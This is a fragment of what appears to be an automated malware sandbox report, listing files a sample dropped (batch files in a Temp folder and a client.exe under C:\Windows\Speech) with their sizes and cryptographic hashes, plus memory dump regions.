                                                            • C:\Users\Admin\AppData\Local\Temp\nSTk4tfYD6.bat

                                                              Filesize

                                                              168B

                                                              MD5

                                                              46cb298dc5522f250d368c3d03f6c85f

                                                              SHA1

                                                              b3d0599f4a5243e6035675d3b640213811ca1685

                                                              SHA256

                                                              5cc8df2d4295a2fb9d87fa6028a423c9e5b6be0d96fa22339b666519a6580d5e

                                                              SHA512

                                                              583b1ba624774bf4135c39895a009ad1908149d6653152bb190ac3abb34fe879b6b0c7fdf58e01016bb364836cf37c3d0f0a334d0fbb2e596b1a55df88f3c160

                                                            • C:\Users\Admin\AppData\Local\Temp\o1vNVowh3C.bat

                                                              Filesize

                                                              168B

                                                              MD5

                                                              4c3003a7ead41b3cd1549175e6472eba

                                                              SHA1

                                                              ce807a1d474504b94dfb082be4fb9e2fcb036d86

                                                              SHA256

                                                              7a303070e80c2eb81f097e889697a6bb3f4519621791d703fc28047d085260de

                                                              SHA512

                                                              b8601394c6d5ae50d7be6ec9e71a3d9d701b574160ee2ab9f29a5597b4da634ab8c08c286a89b94ddf0cc61ce796aaa1a4df09f61c8c2ed49664c281c9e24e17

                                                            • C:\Users\Admin\AppData\Local\Temp\usSWzSdfMb.bat

                                                              Filesize

                                                              168B

                                                              MD5

                                                              940fdaf9219c6a809f35ab743c49e13d

                                                              SHA1

                                                              f099ac6b2fe3cbf5717c79ac54b426f0b6e30ea4

                                                              SHA256

                                                              c121da927dd9c1e99af5d277c08d836fb76fd17de2420ec514d17e267b2a1351

                                                              SHA512

                                                              3c6b735055e5f203a42a9898ed7c4015b24ad7469f5d7932357ffd68358705e915a035b2045a44d514dfe39ebe788076d165ff52961f45ecdbc82ac7e0c4ecaf

                                                            • C:\Windows\Speech\client.exe

                                                              Filesize

                                                              2.1MB

                                                              MD5

                                                              bf4f13d82d217ed69d80124c50d9441c

                                                              SHA1

                                                              b7ee7d109f61371342e924e6a0c3505347dd318f

                                                              SHA256

                                                              51890bfc6f223014ff16f4bfa6ace8e2d2ec3c81eb6965406813b9ca32b08508

                                                              SHA512

                                                              1ba17e55d6d1f6fda99daffe3f11f995d5e8434901b2aea9105728ccbff1b81727d96bf8811a62e8367fca0ec23bdea331165b001088b183281164269668d2f4

                                                            • memory/5108-25-0x000000001BEB0000-0x000000001BEBC000-memory.dmp

                                                              Filesize

                                                              48KB

                                                            • memory/5108-23-0x000000001BEF0000-0x000000001BF08000-memory.dmp

                                                              Filesize

                                                              96KB

                                                            • memory/5108-21-0x000000001BF40000-0x000000001BF90000-memory.dmp

                                                              Filesize

                                                              320KB

                                                            • memory/5108-20-0x000000001BED0000-0x000000001BEEC000-memory.dmp

                                                              Filesize

                                                              112KB

                                                            • memory/5108-18-0x0000000003020000-0x000000000302E000-memory.dmp

                                                              Filesize

                                                              56KB

                                                            • memory/5108-16-0x0000000000DB0000-0x0000000000F8A000-memory.dmp

                                                              Filesize

                                                              1.9MB